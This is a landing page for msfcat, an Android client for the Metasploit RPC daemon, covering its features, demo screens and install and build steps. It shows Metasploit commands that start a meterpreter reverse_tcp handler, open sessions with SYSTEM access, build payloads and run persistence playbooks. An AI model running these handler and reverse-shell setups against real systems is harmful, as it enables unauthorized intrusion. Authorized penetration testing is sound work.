Android Β· Kotlin Β· Jetpack Compose

The Metasploit console
in your pocket.

msfcat connects directly to a live msfrpcd instance and gives you a full penetration-testing workflow from your Android device β€” sessions, payloads, automation, and on-device AI.

Download APK View Source

For authorized security testing and education only.

msfcat Β· msfrpcd @ 192.168.1.10:55553
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Meterpreter session 1 opened (10.0.0.5:4444 -> 10.0.0.12:49231)
meterpreter > β–ˆ
Features

Everything you need.
On the go.

⚑

Real RPC Backend

Full MessagePack-over-HTTP connection to msfrpcd. No mocks, no stubs β€” real Metasploit.

πŸ–₯️

Interactive Consoles

Full msfconsole terminal tabs with live read/write. Multiple consoles, side by side.

πŸ”—

Session Management

List, interact with, and run commands on active Meterpreter and shell sessions. File browser + process manager built in.

🎯

Module Browser

Search and launch exploits, auxiliaries, and post modules. RHOSTS auto-populated from topology.

πŸ“‘

Listeners

Create, edit, and delete multi/handler listeners. AutoRunScript support for automated post-exploitation.

πŸ’£

Payload Generation

msfvenom-style builder β€” format, encoder, bad chars, templates. Save to device or serve over HTTP for target download.

πŸ—ΊοΈ

Network Topology

Live interactive graph of hosts, services, vulnerabilities, and credentials from the MSF database.

πŸ€–

Automation & Workflows

Saved RC script library, ordered playbooks, and custom module import to the MSF host β€” all from the app.

🧠

On-Device AI Tutor

Gemma 4 running on the NPU via Android AICore β€” offline, private, zero API calls.

πŸ”’

Encrypted Persistence

Connection details stored in AES-256 EncryptedSharedPreferences backed by Android Keystore.

πŸ””

Live Notifications

Ongoing status notification + high-priority "new session" alerts. Foreground service keeps polling in the background.

πŸ“±

Home-Screen Widget

Glanceable connection status, session count, and listener count β€” right on your launcher.

Interactive Demo

See it in action.

Tap the icons in the side rail to explore the real app screens.

2:00
99
Metasploit Console Pro Encrypted Audit Specs
RPC CONNECTION
Connect to msfrpcd
192.168.1.10
55553
● On
msf : β€’β€’β€’β€’β€’β€’β€’β€’β€’β€’
No workspace selected (optional)
Workspaces only organise hosts, creds and reports. You can use Listeners, Payloads, Modules and Consoles without one β€” or tap + to create a workspace.
EXPLOITATION PORTFOLIO
Captured Credentials
Live Auditing Trail
Listener Created12:36:21
Started multi/handler (windows/meterpreter/reverse_tcp) on 0.0.0.0:4444.
Listener Removed12:35:58
Stopped job 1.
Run RC (session)12:33:39
Ran 1 command(s) on session 51.
Workspace Sync12:32:34
db.workspaces failed: Database Not Loaded (is the MSF database connected?)
Initialize Connection12:32:34
Authenticated to msfrpcd at 0.0.0.0:55553.
ON-DEVICE AI
AI Security Tutor
Gemma 4 (E2B) Β· NPU Β· Offline
Explain what MS17-010 EternalBlue does.
EternalBlue exploits a flaw in Microsoft's SMBv1 protocol (CVE-2017-0144). A malformed packet triggers a buffer overflow in the kernel pool, letting an attacker run code as SYSTEM remotely β€” no credentials needed. Patch MS17-010 and disable SMBv1 to mitigate.
Ask the tutorβ€¦βž€
SUBNET WORKSPACE MATRIX
(no workspace) Β· 0 host(s)
Topology Map Node List
Touch-Drag targets to arrange live network topology structure
METASPLOIT DATABASE
Modules Browser
Search exploits, auxiliary…
All Exploit Auxiliary Post
EXPLOITRank: Excellent
aix/local/ibstat_path
exploit/aix/local/ibstat_path
EXPLOITRank: Excellent
aix/local/invscout_rpm_priv_esc
exploit/aix/local/invscout_rpm_priv_esc
EXPLOITRank: Excellent
aix/local/xorg_x11_server
exploit/aix/local/xorg_x11_server
EXPLOITRank: Excellent
aix/rpc_cmsd_opcode21
exploit/aix/rpc_cmsd_opcode21
HANDLER JOBS
Listeners
● RunningJob #0
windows/x64/meterpreter/reverse_tcp
0.0.0.0 : 4444
● RunningJob #1
linux/x64/meterpreter/reverse_tcp
0.0.0.0 : 5555
AUTOMATION
Resource scripts, workflows & custom artifacts
recon_sweep.rc
2 saved RC scripts Β· tap to run in console
Initial Access β†’ Persist
3 ordered steps Β· EXPLOIT β†’ POST β†’ SCRIPT
Import a custom module / plugin / script / payload onto the MSF host (writes to ~/.msf4 via a <ruby> block, then reload).
Kind: PLUGIN
name / relative path (no .rb), e.g. custom/my_scanner
Ruby source
METASPLOIT FRAMEWORK
Consoles CLI (msfconsole)
msfconsole #1
Ready (Idle prompt)
PROVISIONING OPTIONS
CONSOLE ROLE / PRESET TYPE:
Standard Exploit Scanner Post
SPAWN COUNT:
x1 x2 x3 x5
POST-EXPLOITATION SHIELDS
Interactive Tunnels (2)
Session 51
Target IP: 10.114.220.17
METERPRETER
Session 52
Target IP: 10.114.220.17
METERPRETER
● LAB SECURITY STATUS: SECURE DISCOVERED: 0 HOSTS
ACTIVE INTERACTIVE GATEWAYS
COMPROMISED SESSIONS
Session #51 METERPRETER
Target Address: 10.114.220.17
Tunnel Route: 10.54.247.95:4444 <-> 10.114.220.17:51943
Session #52 METERPRETER
Meterpreter Session: #51
Endpoint target: 10.114.220.17 Β· socket: 10.54.247.95:4444 <-> 10.114.220.17:51943
SysInfo Filesystem Processes Payload Console
TARGET SYSTEMS CONFIG telemetry
Target Endpoint
10.114.220.17
Live Tunnel
10.54.247.95:4444 <-> 10.114.220.17:51943
Session #51 Β· Meterpreter
meterpreter > sysinfo
Computer : WIN-TARGET-01
OS : Windows 10 (10.0.19045)
User : NT AUTHORITY\SYSTEM
meterpreter > β–ˆ
Workspaces
RPC tunnel, hosts view & live audit trail
AI Security
On-device Gemma 4 tutor on the NPU
Topology
Live network graph + scanning
Module Browser
Search & launch exploits, aux, post
Listeners
Manage multi/handler jobs
Automation
RC scripts, workflows & artifact import
Terminals
Full interactive msfconsole
Sessions
Interactive Meterpreter & shell sessions
Install

Get msfcat on your device.

01

Download the APK

Grab the latest signed release APK from GitHub.

app-release.apk
02

Allow unknown sources

On your Android device, go to Settings β†’ Apps β†’ Special app access β†’ Install unknown apps and allow your file manager or browser.

03

Install & connect

Open the APK, install it, then enter your msfrpcd host, port, and token in the RPC Tunnel tab.

msfrpcd -P yourpassword -S
Build from source

Build it yourself.

Requires Android Studio and a device or emulator running Android 8.0+.

Terminal 
# Clone the repo
git clone https://github.com/0xriasaat/msfcat.git
cd msfcat

# Create the required .env (placeholder β€” unused at runtime)
echo "GEMINI_API_KEY=placeholder" > .env

# Build debug APK
.\gradlew.bat :app:assembleDebug

# Install on connected device
adb install -r app\build\outputs\apk\debug\app-debug.apk
Stack

Built with modern Android.

Kotlin
Jetpack Compose
Material 3
Coroutines
StateFlow
OkHttp
MessagePack
ML Kit GenAI
Android AICore
EncryptedSharedPrefs
Robolectric
Roborazzi